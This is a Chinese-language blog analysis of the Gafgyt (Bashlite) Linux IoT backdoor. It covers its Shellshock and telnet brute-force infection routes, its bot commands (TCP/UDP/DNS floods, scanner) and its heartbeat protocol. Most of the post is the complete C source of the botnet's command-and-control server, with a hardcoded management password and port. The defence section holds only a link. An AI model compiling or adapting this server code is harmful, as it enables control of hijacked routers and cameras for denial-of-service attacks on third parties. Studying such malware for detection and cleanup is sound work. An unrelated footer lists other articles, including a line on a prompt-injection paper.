.Little Hann
.Little Hann

Linux.BackDoor.Linux.Gafgyt.A Attack And Defense Analysis

catalogue

0. 引论: 嵌入式Linux系统的安全威胁
1. 恶意程序概述
2. 模块分解
3. 通信协议
4. 木马清理

 

0. 引论: 嵌入式Linux系统的安全威胁

0x1: 基于嵌入式Linux平台的设备

在IoT(物联网Internet Of Things)领域中,有很多操作系统可以作为承载平台,其中利用嵌入式Linux平台的最为广泛,尤其广泛用在"网络路由器(家用路由器、Wifi路由器)"、"机顶盒(Set-top box)"、"网络附加存储(Network Attached Storage)"等,网络路由器本身被恶意软件植入是个重大的问题

0x2: 基于嵌入式Linux平台的设备的安全问题

基于嵌入式Linux平台的设备大多数没有考虑到安全而设计和制造,或者内置了制造商提供的后门程序功能

1. 没有考虑安全的设计
很多物联网设备没有考虑安全而设计并制造,一些网络路由器和IP摄像机很多端口是开放的,攻击者可以利用空密码/弱密码/预设密码对这些端口进行访问。这种设备通常内置BusyBox程序,可以利用该程序运行Linux命令,如果支持wget指令的话,就很容易成为黑客的肉鸡

2. 内置后门功能
很多设备发现内置了后门程序,从外部可以访问,最初的目的可能是为了方便调试测试

3. 感染恶意软件
嵌入式Linux系统为了支持Telnet或者Web服务器功能,打开了很多端口来使用

Relevant Link:

http://cn.ahnlab.com/global/upload/download/asecreport/ahnlab_zh_201510_vol.36.pdf

 

1. 恶意程序概述

Backdoor.Linux.Gafgyt.A is a Backdoor that targets the Linux platforms. This malware allegedly arrives on the targeted system as a result of exploiting the vulnerability known as CVE-2014-6271(Bash Shellock).This malware contacts a remote server to receive and execute commands on the infected system. These commands include the capability to open a backdoor on the infected system and to perform various DoS attacks.

0x1: Intrusion via

Brute-forcing telnet
Shellshock vulnerabilities

0x2: IRC bot with implemented client commands 

1. PING
2. GETLOCALIP
3. SCANNER
4. TCP
5. UDP
6. DNS
7. KILLATTK
8. LOLNOGTFO

0x3: Threat for embedded devices 

1. EM_386
2. EM_x86_64
3. EM_SPARC
4. EM_PPC
5. EM_SH
6. EM_ARM
7. EM_MIPS
8. EM_68K

Relevant Link:

http://telussecuritylabs.com/threats/show/TSL20140925-03
http://www.symantec.com/security_response/writeup.jsp?docid=2014-100222-5658-99
https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Linux~DDoS-BI/detailed-analysis.aspx
https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/KalnaiHorejsi-VB2015.pdf


2. 模块分解

0x1: CC源代码

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#include <time.h>
#include <fcntl.h>
#include <sys/epoll.h>
#include <errno.h>
#include <pthread.h>
#include <signal.h>

// This is what you will connect to through telnet.
// This port is different the the bot port. Which is set when you run the server.
// This is for management and commands interface.
#define MY_MGM_PASS "Cxy0123"
#define MY_MGM_PORT 420

#define MAXFDS 1000000 // No way we actually reach this amount. Ever.

struct clientdata_t {
        uint32_t ip;
        char build[7];
        char connected;
} clients[MAXFDS];

struct telnetdata_t {
        int connected;
} managements[MAXFDS];

static volatile FILE *fileFD;
static volatile int epollFD = 0;
static volatile int listenFD = 0;
static volatile int managesConnected = 0;

int fdgets(unsigned char *buffer, int bufferSize, int fd)
{
        int total = 0, got = 1;
        while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
        return got;
}
void trim(char *str) // Remove whitespace from a string and properly null-terminate it.
{
    int i;
    int begin = 0;
    int end = strlen(str) - 1;
    while (isspace(str[begin])) begin++;
    while ((end >= begin) && isspace(str[end])) end--;
    for (i = begin; i <= end; i++) str[i - begin] = str[i];
    str[i - begin] = '\0';
}


static int make_socket_non_blocking (int sfd)
{ // man fcntl
    int flags, s;
    flags = fcntl (sfd, F_GETFL, 0);
    if (flags == -1)
    {
            perror ("fcntl");
            return -1;
    }
    flags |= O_NONBLOCK;
    /*
          F_SETFL (int)
          Set  the  file  status  flags  to  the  value specified by arg.  File access mode (O_RDONLY, O_WRONLY, O_RDWR) and file creation flags (i.e., O_CREAT, O_EXCL, O_NOCTTY, O_TRUNC) in arg are
          ignored.  On Linux this command can change only the O_APPEND, O_ASYNC, O_DIRECT, O_NOATIME, and O_NONBLOCK flags.
    */
    s = fcntl (sfd, F_SETFL, flags);
    if (s == -1)
    {
            perror ("fcntl");
            return -1;
    }
    return 0;
}


static int create_and_bind (char *port)
{
    struct addrinfo hints;
    struct addrinfo *result, *rp;
    int s, sfd;
    memset (&hints, 0, sizeof (struct addrinfo));
    hints.ai_family = AF_UNSPEC;     /* Return IPv4 and IPv6 choices */
    hints.ai_socktype = SOCK_STREAM; /* We want a TCP socket */
    hints.ai_flags = AI_PASSIVE;     /* All interfaces */
    s = getaddrinfo (NULL, port, &hints, &result);
    if (s != 0)
    {
        fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s));
        return -1;
    }
    for (rp = result; rp != NULL; rp = rp->ai_next)
    {
        sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol);
        if (sfd == -1) continue;
        int yes = 1;
        if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt");
        s = bind (sfd, rp->ai_addr, rp->ai_addrlen);
        if (s == 0)
        {
                break;
        }
        close (sfd);
    }
    if (rp == NULL)
    {
        fprintf (stderr, "Could not bind\n");
        return -1;
    }
    freeaddrinfo (result);
    return sfd;
}
void broadcast(char *msg, int us) // sends message to all bots, notifies the management clients of this happening
{
        int sendMGM = 1;
        if(strcmp(msg, "PING") == 0) sendMGM = 0; // Don't send pings to management. Why? Because a human is going to ignore it.
        char *wot = malloc(strlen(msg) + 10);
        memset(wot, 0, strlen(msg) + 10);
        strcpy(wot, msg);
        trim(wot);
        time_t rawtime;
        struct tm * timeinfo;
        time(&rawtime);
        timeinfo = localtime(&rawtime);
        char *timestamp = asctime(timeinfo);
        trim(timestamp);
        int i;
        for(i = 0; i < MAXFDS; i++)
        {
                if(i == us || (!clients[i].connected &&  (sendMGM == 0 || !managements[i].connected))) continue;
                if(sendMGM && managements[i].connected)
                {
                        send(i, "\x1b[33m", 5, MSG_NOSIGNAL);
                        send(i, timestamp, strlen(timestamp), MSG_NOSIGNAL);
                        send(i, ": ", 2, MSG_NOSIGNAL);
                } //just a prompt with a timestamp.
                printf("sent to fd: %d\n", i); // debug info, possibly also intrusion detection. Tells you when a management client connected on command line.
                send(i, msg, strlen(msg), MSG_NOSIGNAL);
                if(sendMGM && managements[i].connected) send(i, "\r\n\x1b[31m> \x1b[0m", 13, MSG_NOSIGNAL); // send a cool looking prompt to a manager/admin
                else send(i, "\n", 1, MSG_NOSIGNAL);
        }
        free(wot);
}

void *epollEventLoop(void *useless) // the big loop used to control each bot asynchronously. Many threads of this get spawned.
{
    struct epoll_event event;
    struct epoll_event *events;
    int s;
    events = calloc (MAXFDS, sizeof event);
    while (1)
    {
        int n, i;
        n = epoll_wait (epollFD, events, MAXFDS, -1);
        for (i = 0; i < n; i++)
        {
            if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN)))
            {
                clients[events[i].data.fd].connected = 0;
                close(events[i].data.fd);
                continue;
            }
            else if (listenFD == events[i].data.fd)
            {
                while (1)
                {
                    struct sockaddr in_addr;
                    socklen_t in_len;
                    int infd, ipIndex;

                    in_len = sizeof in_addr;
                    infd = accept (listenFD, &in_addr, &in_len); // accept a connection from a bot.
                    if (infd == -1)
                    {
                        if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break;
                        else
                        {
                            perror ("accept");
                            break;
                        }
                    }

                    clients[infd].ip = ((struct sockaddr_in *)&in_addr)->sin_addr.s_addr;

                    int dup = 0;
                    for(ipIndex = 0; ipIndex < MAXFDS; ipIndex++) // check for duplicate clients by seeing if any have the same IP as the one connecting
                    {
                        if(!clients[ipIndex].connected || ipIndex == infd) continue;

                        if(clients[ipIndex].ip == clients[infd].ip)
                        {
                            dup = 1;
                            break;
                        }
                    }

                    if(dup)
                    {
                        printf("Duplicate Client\n"); // warns the operator on command line
                        if(send(infd, "!* LOLNOGTFO\n", 13, MSG_NOSIGNAL) == -1) { close(infd); continue; } // orders all the bots to immediately kill themselves if we see a duplicate client! MAXIMUM PARANOIA
                        if(send(infd, "DUP\n", 4, MSG_NOSIGNAL) == -1) { close(infd); continue; } // same thing as above.
                        close(infd);
                        continue;
                    }

                    s = make_socket_non_blocking (infd);
                    if (s == -1) { close(infd); break; }

                    event.data.fd = infd;
                    event.events = EPOLLIN | EPOLLET;
                    s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event);
                    if (s == -1)
                    {
                        perror ("epoll_ctl");
                        close(infd);
                        break;
                    }

                    clients[infd].connected = 1;
                    //send(infd, "!* SCANNER ON\n", 14, MSG_NOSIGNAL);
                }
                continue;
            }
            else
            {
                int thefd = events[i].data.fd;
                struct clientdata_t *client = &(clients[thefd]);
                int done = 0;
                client->connected = 1;
                while (1)
                {
                    ssize_t count;
                    char buf[2048];
                    memset(buf, 0, sizeof buf);

                    while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, thefd)) > 0)
                    {
                        if(strstr(buf, "\n") == NULL) { done = 1; break; }
                        trim(buf);
                        if(strcmp(buf, "PING") == 0) // basic IRC-like ping/pong challenge/response to see if server is alive
                        {
                            if(send(thefd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // response
                            continue;
                        }
                        if(strstr(buf, "BUILD ") == buf)
                        {
                            char *build = strstr(buf, "BUILD ") + 6;
                            if(strlen(build) > 9) { printf("build bigger then 6\n"); done = 1; break; }
                            memset(client->build, 0, 7);
                            strcpy(client->build, build);
                            continue;
                        }
                        if(strstr(buf, "REPORT ") == buf) // received a report of a vulnerable system from a scan
                        {
                            char *line = strstr(buf, "REPORT ") + 7;
                            fprintf(fileFD, "%s\n", line); // let's write it out to disk without checking what it is!
                            fflush(fileFD);
                            //TODO: automatically exploit that particular IP after scanning for dir and uploading correct arch stuffs.
                            continue;
                        }
                        if(strcmp(buf, "PONG") == 0)
                        {
                            //should really add some checking or something but meh
                            continue;
                        }

                        printf("buf: \"%s\"\n", buf);
                    }

                    if (count == -1)
                    {
                        if (errno != EAGAIN)
                        {
                                done = 1;
                        }
                        break;
                    }
                    else if (count == 0)
                    {
                        done = 1;
                        break;
                    }
                }

                if (done)
                {
                    client->connected = 0;
                    close(thefd);
                }
            }
        }
    }
}

unsigned int clientsConnected() // counts the number of bots connected by looping over every possible file descriptor and checking if it's connected or not
{
        int i = 0, total = 0;
        for(i = 0; i < MAXFDS; i++)
        {
                if(!clients[i].connected) continue;
                total++;
        }

        return total;
}

void *titleWriter(void *sock) // just an informational banner
{
        // this LOOKS vulnerable, but it's actually not.
        // there's no way we can have 2000 digits' worth of clients/bots connected to overflow that char array
        int thefd = (int)sock;
        char string[2048];
        while(1)
        {
                memset(string, 0, 2048);
                sprintf(string, "%c]0;Hoes connected: %d | Pimps connected: %d%c", '\033', clientsConnected(), managesConnected, '\007');
                // \007 is a bell character... causes a beep. Why is there a beep here?
                if(send(thefd, string, strlen(string), MSG_NOSIGNAL) == -1) return;

                sleep(2);
        }
}


void *telnetWorker(void *sock)
{
        int thefd = (int)sock;
        managesConnected++;
        pthread_t title;
        char buf[2048];
        memset(buf, 0, sizeof buf);

        if(send(thefd, "Password: ", 10, MSG_NOSIGNAL) == -1) goto end; /* failed to send... kill connection  */
        if(fdgets(buf, sizeof buf, thefd) < 1) goto end; /* no data, kill connection */
        trim(buf);
        if(strcmp(buf, MY_MGM_PASS) != 0) goto end; /* bad pass, kill connection */
        memset(buf, 0, 2048);
        if(send(thefd, "\033[1A", 4, MSG_NOSIGNAL) == -1) goto end;
        pthread_create(&title, NULL, &titleWriter, sock); /* writes the informational banner to the admin after a login */
        if(send(thefd, "\x1b[31m*****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
        if(send(thefd, "*        WELCOME TO THE BALL PIT        *\r\n", 43, MSG_NOSIGNAL) == -1) goto end;
        if(send(thefd, "*     Now with \x1b[32mrefrigerator\x1b[31m support     *\r\n", 53, MSG_NOSIGNAL) == -1) goto end;
        if(send(thefd, "*****************************************\r\n\r\n> \x1b[0m", 51, MSG_NOSIGNAL) == -1) goto end;
        /* If we can't send the useless banner, kill ourselves! Amazing error handling! */
        managements[thefd].connected = 1;

        while(fdgets(buf, sizeof buf, thefd) > 0)
        {
                trim(buf);
                if(send(thefd, "\x1b[31m> \x1b[0m", 11, MSG_NOSIGNAL) == -1) goto end;
                if(strlen(buf) == 0) continue;
                printf("Management: \"%s\"\n", buf);
                broadcast(buf, thefd); // take a command, send it to the bots
                memset(buf, 0, 2048);
        }

        end:    // cleanup dead socket
                managements[thefd].connected = 0;
                close(thefd);
                managesConnected--;
}

void *telnetListener(void *useless)
{
        int sockfd, newsockfd;
        socklen_t clilen;
        struct sockaddr_in serv_addr, cli_addr;
        sockfd = socket(AF_INET, SOCK_STREAM, 0);
        if (sockfd < 0) perror("ERROR opening socket");
        bzero((char *) &serv_addr, sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        serv_addr.sin_addr.s_addr = INADDR_ANY;
        serv_addr.sin_port = htons(MY_MGM_PORT);
        if (bind(sockfd, (struct sockaddr *) &serv_addr,  sizeof(serv_addr)) < 0) perror("ERROR on binding");
        listen(sockfd,5);
        clilen = sizeof(cli_addr);
        while(1)
        {
                newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
                if (newsockfd < 0) perror("ERROR on accept");
                pthread_t thread;
                pthread_create( &thread, NULL, &telnetWorker, (void *)newsockfd);
        }
}

int main (int argc, char *argv[])
{
    signal(SIGPIPE, SIG_IGN); // ignore broken pipe errors sent from kernel

    int s, threads;
    struct epoll_event event;

    if (argc != 3)
    {
        fprintf (stderr, "Usage: %s [port] [threads]\n", argv[0]);
        exit (EXIT_FAILURE);
    }
    fileFD = fopen("output.txt", "a+"); // TOCTOU vuln if we have access to CnC
    threads = atoi(argv[2]);

    listenFD = create_and_bind (argv[1]); // try to create a listening socket, die if we can't
    if (listenFD == -1) abort ();

    s = make_socket_non_blocking (listenFD); // try to make it nonblocking, die if we can't
    if (s == -1) abort ();

    s = listen (listenFD, SOMAXCONN); // listen with a huuuuge backlog, die if we can't
    if (s == -1)
    {
            perror ("listen");
            abort ();
    }

    epollFD = epoll_create1 (0); // make an epoll listener, die if we can't
    if (epollFD == -1)
    {
            perror ("epoll_create");
            abort ();
    }

    event.data.fd = listenFD;
    event.events = EPOLLIN | EPOLLET;
    s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event);
    if (s == -1)
    {
            perror ("epoll_ctl");
            abort ();
    }

    pthread_t thread[threads + 2];
    while(threads--)
    {
            pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL); // make a thread to command each bot individually
    }

    pthread_create(&thread[0], NULL, &telnetListener, (void *)NULL);

    while(1)
    {
            broadcast("PING", -1); // ping bots every 60 sec on the main thread

            sleep(60);
    }

    close (listenFD);

    return EXIT_SUCCESS;
}

Relevant Link:

http://www.bot24.com/2015/03/elf-gafgyt-trojan-server-source-code.html
https://www.virustotal.com/en/file/2a04c216fce75d19e5162081eb747b8a77c205f6dd933b0864c08fb086c929c5/analysis/1425921008/
http://www.cnblogs.com/LittleHann/p/5215766.html


3. 通信协议

1. Client -> CC Server: \x42\x55\x49\x4c\x44\x20\x32\x36\x33\x37\x38\x32
2. CC中控accept客户端后,进入待命状态,不回复客户端任何response
3. CC Server -> Client: 间隔固定时间窗口向Client发送心跳包: PING
4. Client -> CC Server: 回复心跳包: PONG


4. 木马清理

Relevant Link:

https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Linux~DDoS-BI.aspx

 

Copyright (c) 2016 LittleHann All rights reserved

 

你可能感兴趣的:(Linux.BackDoor.Linux.Gafgyt.A Attack And Defense Analysis)

  • CesiumJS+SuperMap3D.js混用实现可视域分析 S3M图层加载 裁剪区域绘制 SteveJi666 WebGLcesiumEarthSDKSuperMap3djavascript前端arcgis
    版本简介:cesium:1.99;Supermap3D:SuperMapiClientJavaScript11i(2023);官方下载文档链家:SuperMap技术资源中心|为您提供全面的在线技术服务示例参考:support.supermap.com.cn:8090/webgl/Cesium/examples/webgl/examples.html#analysissupport.supermap
  • CesiumJS+SuperMap3D.js混用实现通视分析 SteveJi666 WebGLcesiumEarthSDKSuperMap3djavascript前端arcgis
    版本简介:cesium:1.99;Supermap3D:SuperMapiClientJavaScript11i(2023);官方下载文档链家:SuperMap技术资源中心|为您提供全面的在线技术服务示例参考:support.supermap.com.cn:8090/webgl/Cesium/examples/webgl/examples.html#analysissupport.supermap
  • 概率潜在语义分析(Probabilistic Latent Semantic Analysis,PLSA)—无监督学习方法、概率模型、生成模型、共现模型、非线性模型、参数化模型、批量学习 剑海风云 ArtificialIntelligence人工智能机器学习概率潜在语义分析PLSA
    定义输入:设单词集合为W={ω1,ω2,⋯ ,ωM}W=\{\omega_1,\omega_2,\cdots,\omega_M\}W={ω1,ω2,⋯,ωM},文本集合为D={d1,d2,⋯ ,dN}D=\{d_1,d_2,\cdots,d_N\}D={d1,d2,⋯,dN},话题集合为Z={z1,z2,⋯ ,zN}Z=\{z_1,z_2,\cdots,z_N\}Z={z1,z2,⋯,zN},共现
  • 算法设计与分析 合并排序的递归实现算法 Jxcupupup 算法算法算法设计与分析
    合并排序的递归实现算法。输入:先输入进行合并排序元素的个数,然后依次随机输入(或随机生成)每个数字。输出:元素排序后的结果,数字之间不加任何标识符。示//完整代码在GitHub上//https://github.com/Jxcup/Course_Algorithm_Analysis-Design/blob/main/MergeSort_iteration.cpp//合并排序递归#includeus
  • AI学习笔记:pdf-document-layout-analysis hillstream3 人工智能学习笔记pdfAI编程nlp
    一直在学AI,但没有连续的时间来尝试。现在终于失业了,有大把连续的时间来动手。之前准备了一台I5-1400F+RTX360012G的电脑,现在终于派上用场了。由于一直在从事无线通信相关的工作,所以,拿到一份很长的AI可能与通信在哪些方面,能够结合的pdf文档。所以,打算从这份文档开始入手。第一个找到的项目的是这个:https://huggingface.co/HURIDOCS/pdf-docume
  • 线性判别分析 (Linear Discriminant Analysis, LDA) ALGORITHM LOL 人工智能机器学习算法
    线性判别分析(LinearDiscriminantAnalysis,LDA)通俗易懂算法线性判别分析(LinearDiscriminantAnalysis,LDA)是一种用于分类和降维的技术。其主要目的是找到一个线性变换,将数据投影到一个低维空间,使得在这个新空间中,不同类别的数据能够更好地分离。线性判别分析的核心思想LDA的基本思路是最大化类间方差(between-classvariance)与
  • 网络安全的相关比赛有哪些?需要掌握哪些必备技能? 网安学习 web安全安全网络安全的相关比赛有哪
    01、CTF(夺旗赛)这是一种最常见的网络安全竞技形式,要求参赛者在限定时间内解决一系列涉及密码学、逆向工程、漏洞利用、取证分析等领域的挑战,获取标志(flag)并提交得分。通过举办CTF来培养网络安全人才,已经发展成为了国际网络安全圈的共识。CTF赛事可以分为线上赛和线下赛,线上赛通常是解题模式(Jeopardy),线下赛通常是攻防模式(Attack-Defense)。CTF赛事的代表性线下赛事
  • 404 error when doing workload anlysis using locust on OpenAI API (GPT.35) 营赢盈英 AI人工智能pythonopenailocust
    题意:"使用Locust对OpenAIAPI(GPT-3.5)进行工作负载分析时出现404错误。"问题背景:IamtryingtodosomeworkloadanalysisonOpenAIGPT-3.5-TURBOusinglocust."我正在使用Locust对OpenAIGPT-3.5-TURBO进行一些工作负载分析。"fromlocustimportHttpUser,between,tas
  • 打卡第13天:《利用python进行数据分析》学习笔记 且不了了
    第7章——数据规整化:清理、转换、合并、重塑数据变换http://nbviewer.jupyter.org/github/qiebuliaoliao/data_analysis_python/blob/master/ch7/20180405.ipynb
  • 论文翻译:arxiv-2022 Ignore Previous Prompt: Attack Techniques For Language Models CSPhD-winston-杨帆 论文翻译LLMs-安全prompt语言模型人工智能
    IgnorePreviousPrompt:AttackTechniquesForLanguageModelshttps://arxiv.org/pdf/2211.09527忽略之前的提示:针对语言模型的攻击技术文章目录忽略之前的提示:针对语言模型的攻击技术摘要1引言摘要基于Transformer的大型语言模型(LLMs)为大规模面向客户的应用程序中的自然语言任务提供了强大的基础。然而,探索恶意用户
  • 亦菲喊你来学机器学习(20) --PCA数据降维 方世恩 机器学习人工智能深度学习python算法sklearn
    文章目录PCA数据降维一、降维二、优缺点三、参数四、实例应用1.读取文件2.分离特征和目标变量3.使用PCA进行降维4.打印特征所占百分比和具体比例5.PCA降维后的数据6.划分数据集7.训练逻辑回归模型8.评估模型性能总结PCA数据降维主成分分析(PrincipalComponentAnalysis,PCA)是一种常用的数据降维技术,它可以在保留数据集中最重要的特征的同时,减少数据的维度。PCA
  • python 自动下载ERA5 netCDF4格式数据 INFO Request is queued 水猪1 python
    2024-05-2111:18:46,271INFOWelcometotheCDS2024-05-2111:18:46,289INFOSendingrequesttohttps://cds.climate.copernicus.eu/api/v2/resources/reanalysis-era5-pressure-levels2024-05-2111:18:46,512INFORequestis
  • Python的情感词典情感分析和情绪计算 yava_free python大数据人工智能
    一.大连理工中文情感词典情感分析(SentimentAnalysis)和情绪分类(EmotionClassification)都是非常重要的文本挖掘手段。情感分析的基本流程如下图所示,通常包括:自定义爬虫抓取文本信息;使用Jieba工具进行中文分词、词性标注;定义情感词典提取每行文本的情感词;通过情感词构建情感矩阵,并计算情感分数;结果评估,包括将情感分数置于0.5到-0.5之间,并可视化显示。目
  • 使用Python和Jieba库进行中文情感分析:从文本预处理到模型训练的完整指南 快撑死的鱼 Python算法精解python人工智能开发语言
    使用Python和Jieba库进行中文情感分析:从文本预处理到模型训练的完整指南情感分析(SentimentAnalysis)是自然语言处理(NLP)领域中的一个重要分支,旨在从文本中识别出情绪、态度或意见等主观信息。在中文文本处理中,由于语言特性不同于英语,如何高效、准确地分词和提取关键词成为情感分析的关键步骤之一。在这篇文章中,我们将深入探讨如何使用Python和Jieba库进行中文情感分析,
  • pytorch计算网络参数量和Flops Mr_Lowbee PyTorchpytorch深度学习人工智能
    fromtorchsummaryimportsummarysummary(net,input_size=(3,256,256),batch_size=-1)输出的参数是除以一百万(/1000000)M,fromfvcore.nnimportFlopCountAnalysisinputs=torch.randn(1,3,256,256).cuda()flop_counter=FlopCountAna
  • 股票中的情侣——配对交易 鸿鹄Max
    什么是配对交易?配对交易(PairsTrading)是指八十年代中期华尔街著名投行MorganStanley的数量交易员NunzioTartaglia成立的一个数量分析团队提出的一种市场中性投资策略,,其成员主要是物理学家、数学家、以及计算机学家。GanapathyVidyamurthy在《PairsTrading:QuantitativeMethodsandAnalysis》一书中定义配对交易为
  • 多模态大模型论文总结 sudun_03 语言模型算法人工智能
    MM1:Methods,Analysis&InsightsfromMultimodalLLMPre-training在这项工作中,我们讨论了建立高性能的多模态大型语言模型(MLLMs)。特别是,我们研究了各种模型结构组件和数据选择的重要性。通过对图像编码器、视觉语言连接器和各种预训练数据选择的仔细而全面的验证,我们确定了几个关键的设计教训。例如,我们证明,与其他已发表的多模式预训练结果相比,对于使
  • 科研绘图系列:R语言富集散点图(enrichment scatter plot) 生信学习者1 SCI科研绘图系列r语言数据可视化
    介绍富集通路散点图(EnrichmentPathwayScatterPlot)是一种数据可视化工具,用于展示基因集富集分析(GeneSetEnrichmentAnalysis,GSEA)的结果。横坐标是对应基因名称,纵坐标是通路名称,图中的点表示该基因在某个通路下的qvalue,可以简单理解为不同环境下的贡献大小。加载R包导入所需要的R包,在导入前需要用户自己安装。library(readxl)l
  • CS269I:Incentives in Computer Science 学习笔记 Lecture 16: Revenue-Maximizing Auctions(收入最大化拍卖) ldc1513 学习笔记算法博弈论
    Lecture16:Revenue-MaximizingAuctions(收入最大化拍卖)1RevenueMaximizationandBayesianAnalysis一直以来,我们关注的都是最大化社会福利的拍卖设计(至少在那些真实出价的场景中)。福利最大化确实是在很多场景中我们最多考虑的事情,比如我们之前看了很长时间的赞助搜索和在线广告。在福利最大化拍卖中,收入也被考虑过,但也仅仅是机制的一个副
  • es安装ik分词器 abments ESelasticsearchjenkins大数据
    下载分词器首先确定es对应的版本(假设版本是7.10.0)根据版本下载指定的分词器开始安装在线安装./bin/elasticsearch-plugininstallhttps://github.com/medcl/elasticsearch-analysis-ik/releases/download/v7.10.0/elasticsearch-analysis-ik-7.10.0.zip离线安装-
  • 2020-12-05 幸福大黑鸭
    IT1.LeetCode:存在重复元素Java编写2020-12-05(217.存在重复元素)2.《Java从入门到精通》明日科技:P331~335阅读记xmind笔记,并自己实现实例。知识点之前确实都学过,但还是再系统复习一下吧。3.《Semantic-awareWorkflowConstructionandAnalysisforDistributedDataAnalyticsSystems》:
  • 语音识别 学习笔记2024 AI算法网奇 深度学习基础音视频人工智能
    目录dragonfly阿里达摩院FunASR:一款高效的端到端语音识别工具包不错的功能介绍librosa安装语音识别dragonfly阿里达摩院FunASR:一款高效的端到端语音识别工具包不错的功能介绍librosa,一个很有趣的Python库!-简书音频转特征向量GitHub-librosa/librosa:Pythonlibraryforaudioandmusicanalysislibrosa
  • Python之Pandas详解 八秒记忆的老男孩 PythonPython基础pythonpandas开发语言
    Pandas是Python语言的一个扩展程序库,用于数据分析。Pandas是一个开放源码、BSD许可的库,提供高性能、易于使用的数据结构和数据分析工具。Pandas名字衍生自术语“paneldata”(面板数据)和“Pythondataanalysis”(Python数据分析)。Pandas一个强大的分析结构化数据的工具集,基础是NumPy(提供高性能的矩阵运算)。Pandas可以从各种文件格式比
  • 数值分析——LU分解(LU Factorization) 怀帝阍而不见 计算数学c++
    本系列整理自博主21年秋季学期本科课程数值分析I的编程作业,内容相对基础,参考书:DavidKincaid,WardCheney-NumericalAnalysisMathematicsofScientificComputing(2002,AmericalMathematicalSociety)目录背景LU分解(LU-Factorization)辅助部分Doolittle分解Cholesky分解定
  • ATAM stone_flower_rain 软件测试ATAM
    1.基本信息ATAM:ArchitectureTradeoffAnalysisMethod(构架权衡分析方法),它是评价软件构架的一种综合全面的方法。这种方法不仅可以揭示出构架满足特定质量目标的情况,而且(因为它认识到了构架决策会影响多个质量属性)可以使我们更清楚地认识到质量目标之间的联系——即如何权衡诸多质量目标。2.参与人员评估小组该小组是所评估构架的项目外部的小组。它通常由3~5个人组成。在
  • 架构权衡分析法ATAM 崔世勋 软件架构
    ArchitectureTradeoffAnalysisMethod使用ATAM方法对软件架构进行评估的目标,是理解架构关于软件的质量属性需求决策的结果。ATAM方法不但提示了架构如何满足特定的质量目标,而且还提供了这些质量目标是如何交互的,即它们之间是如何权衡的。最后欢迎大家访问我的个人网站:1024s
  • Xilinx Vivado的RTL分析(RTL analysis)、综合(synthesis)和实现 2401_84185145 程序员fpga开发
    理论上,FPGA从编程到下载实现预期功能的过程最少仅需要上述7个步骤中的4、5、6和7,即RTL分析、综合、实现和下载。其中的RTL分析、综合、实现的具体含义和区别又是什么?2、RTL分析(RTLanalysis)一般来讲,通常的设计输入都是Verilog、VHDL或者SystemVerilog等硬件描述语言HDL编写的文件,RTL分析这一步就是将HDL语言转化成逻辑电路图的过程。比如HDL语言描
  • 矢量数据的空间分析——叠加分析 进击的码农设计师
    叠加分析是对不同的数据进行一系列的集合运算,常用于提取要素的空间隐含信息。1.擦除分析:擦除分析是将输入要素中去除掉与擦除要素的多边形相交的部分,将输入要素处于擦除要素外部边界之外的部分输出到新要素类。打开【系统工具箱→AnalysisTools→叠加分析→擦除】工具,设置输入要素和擦除要素。2.相交分析:相交分析是对输入要素做几何交集操作,输入要素可以是各种几何类型要素(点、线、面)的组合。打开
  • pp.weekly.statistical_weekly_analysis_chart 统计周报分析图 小二郎_Ejun
    URLpp.weekly.statistical_weekly_analysis_chart请求方式POST请求参数参数名类型必填说明token[string]是无skip_type[string]是一级获取查询的类型skip_value[string]是一级获取查询的数据key_value[string]是对应的key,取参类型query_time[string]否查询时间,时间戳秒(默认今天)
  • 情感分析相关汇总 宁缺100 自然语言处理自然语言处理情感分析
    文章目录情感分析语音情感识别句子or文档级别情感分析情感词汇字典大连理工大学中文情感词汇本体中文金融情感词典金融社交媒体数据应用的市场情绪词典中文情感分析常用词典台湾大学NTUSD简体中文情感词典BosonNLPABSA细腻度情感分析相关比赛【千言情感分析】SKEP句子级情感分析相关博客或者论文中文情感分析(SentimentAnalysis)的难点在哪?现在做得比较好的有哪几家?文本挖掘在商品评
  • Js函数返回值 _wy_ jsreturn
    一、返回控制与函数结果,语法为:return 表达式;作用: 结束函数执行,返回调用函数,而且把表达式的值作为函数的结果 二、返回控制语法为:return;作用: 结束函数执行,返回调用函数,而且把undefined作为函数的结果 在大多数情况下,为事件处理函数返回false,可以防止默认的事件行为.例如,默认情况下点击一个<a>元素,页面会跳转到该元素href属性
  • MySQL 的 char 与 varchar bylijinnan mysql
    今天发现,create table 时,MySQL 4.1有时会把 char 自动转换成 varchar 测试举例: CREATE TABLE `varcharLessThan4` ( `lastName` varchar(3) ) ; mysql> desc varcharLessThan4; +----------+---------+------+-
  • Quartz——TriggerListener和JobListener eksliang TriggerListenerJobListenerquartz
    转载请出自出处:http://eksliang.iteye.com/blog/2208624 一.概述 listener是一个监听器对象,用于监听scheduler中发生的事件,然后执行相应的操作;你可能已经猜到了,TriggerListeners接受与trigger相关的事件,JobListeners接受与jobs相关的事件。   二.JobListener监听器  j
  • oracle层次查询 18289753290 oracle;层次查询;树查询
    .oracle层次查询(connect  by) oracle的emp表中包含了一列mgr指出谁是雇员的经理,由于经理也是雇员,所以经理的信息也存储在emp表中。这样emp表就是一个自引用表,表中的mgr列是一个自引用列,它指向emp表中的empno列,mgr表示一个员工的管理者, select   empno,mgr,ename,sal  from e
